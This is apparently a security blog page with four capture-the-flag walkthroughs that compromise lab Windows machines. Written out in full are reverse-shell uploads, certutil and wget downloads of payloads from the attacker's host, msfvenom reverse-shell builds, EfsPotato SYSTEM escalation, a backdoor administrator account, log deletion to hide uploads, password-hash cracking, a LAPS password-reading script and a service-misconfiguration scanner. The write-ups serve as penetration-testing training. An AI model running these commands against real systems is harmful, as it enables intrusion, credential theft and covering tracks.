TryHackMe- Stealth

Hello folks,
This blog focuses on a medium-level machine called 'Stealth' on the 'TryHackMe' platform, where the goal is to breach a Windows host. The room is a good check of red-teaming fundamentals: it exercises tools and techniques such as Rustscan, Netcat, PowerShell scripts, csc.exe and more. Let's begin without delay.
You can access the Stealth machine on TryHackMe.
First of all let’s start the machine by clicking on ‘Start Machine’ and after waiting for 3-4 minutes, scan the obtained IP using the tool ‘Rustscan’.

rustscan -a <Machine_IP>

1. Rustscan

Rustscan only tells us which ports are open, not what is listening on them. We can run nmap against just those ports to grab banners and identify service versions (a SYN scan needs root, so prefix the command with sudo if required):

nmap -sS -sV -p5985,7680,8000,8080,8443,47001,49664-49680 <Machine_IP>

1.1 nmap sv

Getting User Access on Stealth

We have 15 open ports on the target. HTTP is served on five of them: 5985, 8000, 8080, 8443 and 47001 (5985 and 47001 are the WinRM/HTTP.sys listeners rather than websites). The lab description also points us to <Machine_IP>:8080, so let's open that port in the browser.

2. Webpage 1

The website offers an upload form for a 'PowerShell Script Analyzer'. Let's find a reverse shell written in PowerShell, change the IP address in it to our own tun0 address and pick a free port for the listener.

3. malicious file

Now, we have to upload the script into the functionality provided on the webpage. Before uploading the .ps1 file, we have to start listening using netcat as follows:

nc -nlvp 1337

After uploading the reverse shell script we wait 3-4 seconds while the script is "analysed" (executed) on the server, after which the reverse connection arrives on our netcat listener.

4. Got first access

After waiting, we can see that we got the reverse shell connection as the 'evader' user. To hunt for the user flag, move to 'C:\Users\evader\Desktop', where there is a file named 'encodedflag'. Reading it shows a Base64-encoded message.

5. Encoded flag

Copy the string over to the attacking machine and decode it with:

echo "<Encoded_message>" | base64 -d

After running the command we will get a hint saying that we have to visit the provided URL in order to get the flag.

6. hint for flag

Let’s visit the provided URL on the browser to get the flag. There is another hint mentioned on the webpage. The hint says that we have to remove the logs from the server for the uploaded files.

7. Another hint

If we go to the web directory located at ‘C:\xampp\htdocs’, we will find an ‘uploads’ directory under which we have a file named ‘log.txt’. Let’s delete the file using the following command:

del log.txt

9. Logfile

After deleting the log file, refreshing the webpage reveals the user flag. That completes user-level access on the target; next we need to escalate privileges to Administrator.

Privilege Escalation on Stealth

There is a file in the ‘uploads’ directory named ‘vulnerable.ps1’. Let’s try to read the contents of the file using the ‘type’ command.

10. vulnerable ps1 file

Its contents are essentially another reverse shell that connects back as the same user. Let's copy the contents, create a file with the same name on our own machine, paste them in and replace the IP address with our tun0 IP and a free port.
Uploading the modified vulnerable.ps1 through the web form overwrites the original file on the server. Then start a netcat listener and execute the script from the existing PowerShell session:

On our machine: nc -nlvp 1234
On target machine: ./vulnerable.ps1

We can see that we got a reverse shell on the netcat listener.

11. got another shell

Let's check which privileges the evader user holds in this shell:

whoami /priv

None of the listed privileges is directly abusable. To find other ways of becoming Administrator or SYSTEM we can run a privilege escalation enumeration script; 'PrivescCheck' is one written in PowerShell. Download it from GitHub and upload it through the site's file upload form.
Then execute it with the command given in the repository's README:

powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"

It will take a minute to generate the output.

12.priv esc vuln

Under the 'Service Binary permissions' section we find that the evader user has full permissions on the Apache2.4 service binary. Rather than tampering with the service itself, note that this same Apache instance serves 'C:\xampp\htdocs' on port 8080, so any PHP file we place in the web root is executed in the context of the account the Apache service runs as, not as evader.
We can use 'p0wny shell' for that. Download it from GitHub on our machine and serve it with a Python web server:

python3 -m http.server 7777

On the target, download the web shell into 'C:\xampp\htdocs' (wget is an alias of Invoke-WebRequest in PowerShell; in a plain cmd shell use certutil instead):

wget http://<Your_IP>:7777/p0wny.php -OutFile p0wny.php

13. uploading p0wny shell

The file is now in the web root and can be executed by requesting it in the browser:

http://<Machine_IP>:8080/p0wny.php

p0wny is a PHP web shell, so the commands we type run inside the Apache process, i.e. as the account the Apache service uses. Let's check the privileges of that account:

whoami /priv

14. got shell on web

The output shows 'SeImpersonatePrivilege', which can be abused with EfsPotato to execute commands as SYSTEM.
The EfsPotato GitHub repository ships a single '.cs' source file that has to be compiled on the target. Download it to the Kali machine, serve it with the same Python web server and fetch it on the target:

wget http://<Your_IP>:7777/EfsPotato.cs -OutFile EfsPotato.cs

15. efs file download

Next we compile it into an executable using the command documented in the repository. csc.exe, the C# compiler, ships with the .NET Framework, so we first need to know which Framework version is installed.
Listing 'C:\Windows\Microsoft.NET\Framework' (or 'Framework64' on 64-bit systems) shows the installed version, here 'v4.0.30319'. Back in 'C:\xampp\htdocs', compile the file with:

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe EfsPotato.cs -nowarn:1691,618

16. efs file created

The current directory now contains a new 'EfsPotato.exe'. Finally, let's run a command through it to confirm it executes as SYSTEM:

EfsPotato.exe “whoami”

The output shows the command ran as NT AUTHORITY\SYSTEM. Great! SYSTEM already has unrestricted access to the host, so what remains is convenience: create a new local user, add it to the 'administrators' group, and log in over RDP to get a graphical session from which we can run anything as an administrator. The command is:

EfsPotato.exe "cmd.exe /c net user CyberiumX Password@123 /add && net localgroup administrators CyberiumX /add"

where, ‘CyberiumX’ is the name of the user and ‘Password@123’ is the login password for this user.

Note: the target enforces a password complexity policy, so the password must contain uppercase and lowercase letters, digits and special characters.

17. created a user

The command executes successfully. RDP (3389) is open on the target, so we can log in as 'CyberiumX' and get a graphical session:

xfreerdp /v:<Machine_IP> /u:CyberiumX /p:Password@123 /workarea /smart-sizing

Once logged in we can open an elevated Command Prompt ('Run as administrator', accepting the UAC prompt) because our user is a member of the Administrators group. From that shell we move to 'C:\Users\Administrator\Desktop' and read the flag.

18. got administrator

We have successfully compromised the Stealth machine of TryHackMe.
In this CTF, we learned about some new concepts for getting access using different powershell scripts. You can check out our other blogs for compromising Windows machines on CyberiumX.


Happy Pentesting!!!

Team CyberiumX

HackTheBox- Timelapse

Hello folks,

This blog focuses on a machine called “Timelapse” within HackTheBox. It has been classified as an easy machine. It is based on the Windows Operating System. You will be learning about Windows Enumeration and Privilege Escalation. Let’s proceed without any delay and begin the penetration testing process.

You can find the machine in the retired category of HackTheBox over here.

First of all let’s start the machine by clicking on “Join Machine” and scan the obtained IP using “NMAP”.

sudo nmap -sS <Machine_IP>

1 Nmap Scan

We can see many open ports such as DNS (53), Kerberos (88), LDAP (389), SMB (445), etc., which confirms that this machine is a Domain Controller in an Active Directory environment. Let's start enumeration with SMB.

Firstly, we will see the available shares and their permissions with the help of smbmap tool using the following command.

smbmap -H <Machine_IP> -u “CyberiumX”

Any username supplied without a password here results in a null/guest session, which is enough to list the shares. We get one share with Read permission, named "Shares".

After that we can use smbclient to connect with the available share.

smbclient \\\\<Machine_IP>\\Shares

2. SMBclient and smbmap

Now, we will check what content we have here on the “Shares” share using dir command. We will find some directories here, so let us visit them one by one and look for some critical files. After looking into the Dev directory we found a file named winrm_backup.zip which looks very interesting. Let’s download it using following command and look for some other important files:

get winrm_backup.zip

3. download files

There is nothing of interest in the other directory, so let's exit and try to unzip the archive:

unzip winrm_backup.zip

The archive contains a .pfx file, but extraction fails because the zip is password protected. To recover the password we generate a crackable hash from the archive with zip2john:

zip2john winrm_backup.zip > zip_password.txt

4. Zip file pass hash

We have the password hash of the zip file. Now we can simply use john the ripper on our zip_password.txt file which contains the hash of the zip file using the following command:

john --wordlist=/usr/share/wordlists/rockyou.txt zip_password.txt

And then we can simply decompress the file with the password we just obtained using the following command:

unzip winrm_backup.zip

It will decompress a file with the name “legacyy_dev_auth.pfx”. Here legacyy or legacyy_dev looks like a username.

5. password for zip file


Getting Foothold on Timelapse

A .pfx (PKCS#12) file bundles a certificate and its private key; from it we can produce the .pem key and .crt certificate needed for certificate-based WinRM authentication. To extract the private key we use the following command, which prompts for the pfx import password that we do not yet know:

openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out CyberiumX_key.pem

6. invalid password

We got an error as invalid password as we do not have access to the password of the pfx file.

So we need a crackable hash of the pfx file, produced by pfx2john, which on Kali lives in /usr/share/john. There is no need to copy the pfx file there; run the script with its full path:

python3 /usr/share/john/pfx2john.py legacyy_dev_auth.pfx > pfx_hash.txt

7. passhash of

This will provide us with the hash of the pfx file. Now, we will again use john the ripper tool to get the password of the pfx file using the following command:

john --wordlist=/usr/share/wordlists/rockyou.txt pfx_hash.txt

8. Pass of pfx file

John the ripper successfully provided us the password of pfx file and now we can finally generate pem file using the same command as follows:

openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out CyberiumX_key.pem

After the import password, openssl asks for a PEM pass phrase to protect the exported key; choose anything (at least four characters), since we strip it again in a moment.

9. pem file

Next, we will generate the crt file using the same tool openssl and pfx file as follows:

openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out CyberiumX_cert.crt

We can see that we have both the files here.

10 crt file

evil-winrm needs the private key unencrypted, so we convert the pass-phrase-protected PEM into a plain RSA private key file (openssl will prompt for the pass phrase we just set):

openssl rsa -in CyberiumX_key.pem -out CyberiumX_rsa.pem

11 rsa file

Now we can use evil-winrm with the machine's IP, the username legacyy, CyberiumX_rsa.pem as the private key and CyberiumX_cert.crt as the client certificate. The -S flag makes it use WinRM over HTTPS (port 5986), which certificate authentication requires:

evil-winrm -i <Machine_IP> -u legacyy -k CyberiumX_rsa.pem -c CyberiumX_cert.crt -S

Great!!! We got our foothold on Timelapse. We can go to User’s Desktop and look for User.txt file.


After trying several privilege escalation methods, we find the password of a user named svc_deploy in the PowerShell command history, which PSReadLine keeps on disk per user:

cat $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

13. Creds looting

Let’s take the access of svc_deploy user on Timelapse using Evilwinrm tool as follows:

evil-winrm -i <Machine_IP> -u svc_deploy -p '<password>' -S

14. svc deploy user shell


Privilege Escalation on Timelapse

Now, we need to find our way to get Administrative access on Timelapse.
In the Documents folder of svc_deploy user, we are getting a directory named AdmPwd.PS.

15. AdmPwd

Researching this module name leads to LAPS (Local Administrator Password Solution), which manages and periodically rotates the local Administrator password of domain-joined computers and stores it in Active Directory. Hence the machine name: Time-LAPS.

16. about LAPS

You can check out the article by HackTricks about LAPS Penetration Testing.
Now let's check whether the LAPS policy value is set in the registry:

reg query "HKLM\Software\Policies\Microsoft Services\AdmPwd" /v AdmPwdEnable

It is set on the target. Next, let's see whether any domain group relates to LAPS:

net groups /domain

17. Confirming LAPS

So, we have a group named LAPS_Readers which is a domain group.
Now let us finally confirm whether we are a member of this group using the following command:

net groups "LAPS_Readers" /domain

18. Permission to read the LAPS

Great!!! We are a member of this group, which means we are allowed to read the LAPS-managed password. With the ActiveDirectory PowerShell module available on the DC, the password is simply an attribute (ms-Mcs-AdmPwd) of the computer object, so we need the DC's computer name:

Get-ADDomainController

19. name of DC

The DC is named dc01. Using that name we can read the attribute that holds the local Administrator password:

Get-ADComputer dc01 -Properties ms-Mcs-AdmPwd

20. admin password
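The Get-ADComputer command above relies on the ActiveDirectory module (RSAT), which is present on a domain controller but often missing on a member workstation. As an added example, not part of the original write-up, the function below reads the same attributes over plain LDAP using the built-in [adsisearcher] type accelerator, so it works from any domain-joined PowerShell session run under the LAPS_Readers account; it also decodes ms-Mcs-AdmPwdExpirationTime (a Windows FILETIME) so you can see when the password will next rotate. It targets the legacy LAPS attribute ms-Mcs-AdmPwd shown on this box; the newer Windows LAPS stores the password in different attributes (msLAPS-*) that this function does not read.

```powershell
# Added example (not from the write-up): read legacy LAPS passwords via LDAP without
# the ActiveDirectory module. The directory only returns ms-Mcs-AdmPwd to principals
# granted read access to it (here: members of LAPS_Readers); for everyone else the
# attribute is absent and the computer is dropped by the (ms-Mcs-AdmPwd=*) clause.

function Get-LapsPassword {
    param(
        # computer name without the trailing '$'; '*' = every entry we are allowed to read
        [string]$ComputerName = '*'
    )
    $filter   = "(&(objectCategory=computer)(name=$ComputerName)(ms-Mcs-AdmPwd=*))"
    $searcher = [adsisearcher]$filter        # searches the current domain by default
    $searcher.PageSize = 500                 # paged results so large domains are not truncated
    [void]$searcher.PropertiesToLoad.AddRange(
        [string[]]@('name', 'dnshostname', 'ms-mcs-admpwd', 'ms-mcs-admpwdexpirationtime'))

    foreach ($result in $searcher.FindAll()) {
        $props   = $result.Properties        # keys are returned lower-cased
        $expires = $null
        if ($props['ms-mcs-admpwdexpirationtime'].Count -gt 0) {
            # stored as a 64-bit FILETIME (100 ns ticks since 1601-01-01 UTC)
            $expires = [datetime]::FromFileTimeUtc([int64]$props['ms-mcs-admpwdexpirationtime'][0])
        }
        [pscustomobject]@{
            Computer = [string]$props['name'][0]
            DnsName  = [string]$props['dnshostname'][0]
            Password = [string]$props['ms-mcs-admpwd'][0]
            Expires  = $expires
        }
    }
}

# Same query as the Get-ADComputer command above, for the DC named dc01
Get-LapsPassword -ComputerName 'dc01'
```

Calling it with the default '*' lists every computer whose password the current account may read, which is a quick way to see how far LAPS_Readers membership actually reaches in a domain.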

Hurray!!! We got the password of the administrator user. Let us again use evilwinrm tool to get access to the administrator user using the looted credentials. The command is as follows:

evil-winrm -i <Machine_IP> -u administrator -p '<password>' -S

21. Got Admin access

Yeah!!! We have administrative access. The root.txt file is not in the Administrator directory, however. Checking the Users folder reveals another user named TRX, and root.txt sits on that user's Desktop, where we can read it with the type command.


So, this was all about the Timelapse machine by HackTheBox. We learned about some new terms here like How to get the password hash of a pfx file and how to crack it, how to get access using key and crt files, about LAPS, etc.

You can checkout out other blogs on HackTheBox machines here.

Happy Pentesting!!!

Team CyberiumX

TryHackMe- Quotient

Hello folks,

This blog focuses on a recently added machine called “Quotient” on the “TryHackMe” platform. It has been classified as an Easy-level challenge. It will help you to sharpen your windows privilege escalation skills. Let’s proceed without any delay and begin the penetration testing process.

Click here to access Quotient machine.

First of all let’s start the machine by clicking on “Start Machine”. Scan the obtained IP using the tool “NMAP”.

nmap -Pn <Machine_IP>

Windows hosts commonly drop ICMP echo requests, so without -Pn nmap would report the host as down; -Pn skips host discovery and scans the ports anyway.

1 nmap

Only RDP (3389) is open, and the room provides credentials, so let's log in with xfreerdp (any RDP client such as Remmina or rdesktop works as well):

xfreerdp /v:<Machine_IP> /u:sage /p:"gr33ntHEphgK2&V" /workarea /smart-sizing


So we got the Graphical User Interface (GUI) access of the machine. We need to find a way to escalate our privileges.

I tried various methods like Abusing Dangerous Privileges, Harvesting passwords from usual spots and scheduled tasks, but got nothing interesting. Then I tried the abusing service misconfiguration and got some interesting output using the following command

wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\"

This command lists every auto-start service whose binary lives outside C:\Windows. An unquoted service path then has to be spotted by eye in the output: a path that does not start with a double quote and contains spaces.

3.services

So, I got a few services and out of them only one contains an Unquoted Service Path which is “Development Service”.

Now let’s get more information about the service using:

sc qc “Development Service”

4. sc qc

Great! The service runs as LocalSystem. To exploit the unquoted path we need a writable directory somewhere along the binary path, which we can check with the "icacls" command on each directory:

icacls “C:\Program Files\Development Files”

5. write permission
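The two manual checks above (spotting an unquoted path, then testing directory permissions with icacls) can be automated. The PowerShell function below is an added example written for this post, not part of the original write-up or of any tool it mentions. It enumerates all services, derives the hijack candidates Windows would try for each unquoted path, and reports which candidate directories, and which service binaries themselves, the current user can write to; that second check is the same 'Service Binary permissions' finding PrivescCheck reported in the Stealth write-up earlier on this page. The ACL test only considers Allow entries for the current user's SIDs and ignores Deny entries, so confirm any hit with icacls before building on it.

```powershell
# Added example for this post (not the write-up's or any tool's own code).
# Enumerates Windows services and flags two classic misconfigurations:
#   1. unquoted binary paths containing spaces, where a writable directory lets
#      us plant e.g. "C:\Program.exe" or "C:\Program Files\Development.exe";
#   2. service binaries the current user can overwrite directly.
# Only Allow ACEs for the current user's SIDs are considered; Deny ACEs are ignored.

function Test-PathWritable {
    param([Parameter(Mandatory)][string]$Path)
    try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { return $false }
    $me        = [Security.Principal.WindowsIdentity]::GetCurrent()
    $mySids    = @($me.User) + @($me.Groups)
    $writeMask = [Security.AccessControl.FileSystemRights]'Write, Modify, FullControl'
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        try { $sid = $ace.IdentityReference.Translate([Security.Principal.SecurityIdentifier]) }
        catch { continue }   # unresolvable identity, skip it
        if ($mySids -notcontains $sid) { continue }
        if (($ace.FileSystemRights -band $writeMask) -ne 0) { return $true }
    }
    return $false
}

function Get-ServiceMisconfig {
    foreach ($svc in Get-CimInstance Win32_Service) {
        $pathName = $svc.PathName
        if (-not $pathName) { continue }
        # Extract the executable: a quoted path is safe from hijacking, an unquoted
        # one is taken up to the first ".exe" (arguments are dropped).
        if ($pathName -match '^"([^"]+)"')      { $exe = $Matches[1]; $quoted = $true }
        elseif ($pathName -match '^(.*?\.exe)') { $exe = $Matches[1]; $quoted = $false }
        else { continue }

        $hijack = @()
        if (-not $quoted -and $exe -match ' ') {
            # For "C:\A B\C D\x.exe" the SCM tries C:\A.exe, then C:\A B\C.exe, then the real file
            $parts = $exe -split ' '
            for ($i = 1; $i -lt $parts.Count; $i++) {
                $candidate = (($parts[0..($i - 1)]) -join ' ') + '.exe'
                if (Test-PathWritable (Split-Path -Parent $candidate)) { $hijack += $candidate }
            }
        }

        [pscustomobject]@{
            Service        = $svc.Name
            RunsAs         = $svc.StartName
            StartMode      = $svc.StartMode
            Binary         = $exe
            BinaryWritable = Test-PathWritable $exe
            HijackPaths    = ($hijack -join '; ')
        }
    }
}

# Show only the services worth a closer look
Get-ServiceMisconfig | Where-Object { $_.BinaryWritable -or $_.HijackPaths } | Format-Table -AutoSize
```

The RunsAs and StartMode columns tell you whether a hit is worth exploiting: a LocalSystem service that starts automatically, as on this box, will run the planted binary with SYSTEM rights at the next boot even if you lack permission to restart the service yourself.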

The output confirms that members of the Users group have write permission on this directory, so we can plant a binary there. Let's create a service executable payload with msfvenom (the exe-service format produces a binary that behaves as a proper service, so the Service Control Manager does not kill it as an unresponsive service):

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<Your_IP> LPORT=4444 -f exe-service -o Devservice.exe

6. msfvenom

Now we can execute python server to host the file using

python3 -m http.server 7777

And we can download the file in “C:\Program Files\Development Files” using certutil command

certutil -urlcache -f http://<Your_IP>:7777/Devservice.exe Devservice.exe

7. Downloading the file on windows

Next, make sure the downloaded file is readable and executable by everyone, so the service account can run it:

icacls Devservice.exe /grant Everyone:F

8. Permission to file

Next thing is to start the listener on our machine using Netcat

nc -nlvp 4444

Now we just need to restart the service using “sc” command

sc stop “Development Service”

But we do not have permission to stop or start this service:

9. Do not have the permission

So we simply restart the system, which an interactive user is allowed to do. On boot the auto-start service launches our planted binary, which delivers the elevated shell to the netcat listener.

10. Restart machine

It took around 1-2 minutes for the system to restart and start the “Development Service”. As soon as the system restarts, you will find that you have a reverse shell as “nt authority\system” user.

11. Got administrator shell

Boom!!! We got elevated access on the device. You can check out the final flag at C:\Users\Administrator\Desktop using the following command:

type C:\Users\Administrator\Desktop\flag.txt


Quotient is a great box to explore windows privilege escalation techniques. Thanks to TryHackMe for this great machine.

Also, you can check out our other blogs on Cyber Security and Penetration testing here.

Happy Pentesting!!!

Team CyberiumX

TryHackMe- Blueprint

Hello folks,

This blog focuses on a recently added machine called “Blueprint” on the “TryHackMe” platform. It has been classified as an easy-level challenge where we need to penetrate our way into a windows machine. Let’s proceed without any delay and begin the penetration testing process.

Click here to access the Blueprint Machine.

First of all let’s start the machine by clicking on “Start Machine”. Scan the obtained IP using the tool “NMAP”.

nmap -sS <Machine_IP>

1.nmap sS

Okay, so we have a lot of open ports (expected from a Windows machine). Let's start enumerating the HTTP ports: 80, 443 and 8080.

Port 80 gives “File not found” error. Port 443 (HTTPS) and 8080 (HTTP) are providing the same website in response.

2. Website

There is a directory mentioned on the webpage with the name “oscommerce-2.3.4/”. It looks like an application with version details. Let’s peek inside it.

3. Website 2

Let's look for known vulnerabilities in this version. There are several for 2.3.4 and for the following release, 2.3.4.1. An interesting one is a Python RCE script in a GitHub repository; you can check it out here.

4. github

Let’s clone the repository and see how to use the python script.

5. clone and use script

Usage is given in the script itself: a base URL followed by the catalog path. Port 80 only returns "File not found", so the base URL must include the port that actually serves the application:

python3 osCommerce2_3_4RCE.py http://<Machine_IP>:8080 /oscommerce-2.3.4/catalog

Let's run it against both ports that serve the site, 8080 (http://) and 443 (https://).

6. Got administrator shell

Booomm!!! We got the shell as nt authority\system using the exploit on the 8080 port. This was very easy.

Let’s look for users on the machine.

7. users on machine

We have two tasks: obtain the NTLM hash of the "Lab" user and crack it, and read the contents of root.txt.

Firstly, let's read the root flag, which is stored on the Administrator user's Desktop. Note that this shell does not let us change directory with cd, so we reference the full path instead.


Yeah, so we got the root flag from the text file. Now our task is to get the Lab user's password. For that, let's first check the architecture of the target Windows machine using the systeminfo command. I tried to upload the mimikatz_x86.exe file but it did not execute and hung my shell.

9. hung shell mimikatz

So let's create an msfvenom payload instead and catch the shell with Metasploit's exploit/multi/handler.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your_machine_IP> LPORT=4444 -f exe -o winshell.exe

Also, let’s start python server to share the file on windows machine.

sudo python3 -m http.server 7777

10. msfvenom

Now, in order to download the file let’s execute certutil command on Windows

certutil -urlcache -f http://<Your_Machine_IP>:7777/winshell.exe winshell.exe

11. downloaded file

Let’s now prepare our reverse shell listener on the metasploit framework using msfconsole command.

Then type following commands to set the listener:

use exploit/multi/handler

show options

set lhost tun0

set payload windows/meterpreter/reverse_tcp

exploit

12. msfconsole

Simply execute the winshell.exe file on windows and you will get a reverse shell on your handler.

Now we dump the local user hashes with the hashdump command of the meterpreter shell.

13. hash

Now simply copy the NTLM hash of the Lab user to CrackStation and crack it. This works because the NT hash is unsalted (MD4 over the UTF-16LE encoded password), so precomputed lookup tables apply directly.

14. cracking hash

So, that’s all for this machine. Blueprint is overall a very easy box by TryHackMe for Windows machines.

Also, you can check out our other blogs on Cyber Security and Penetration testing here.

Happy Pentesting!!!

Team CyberiumX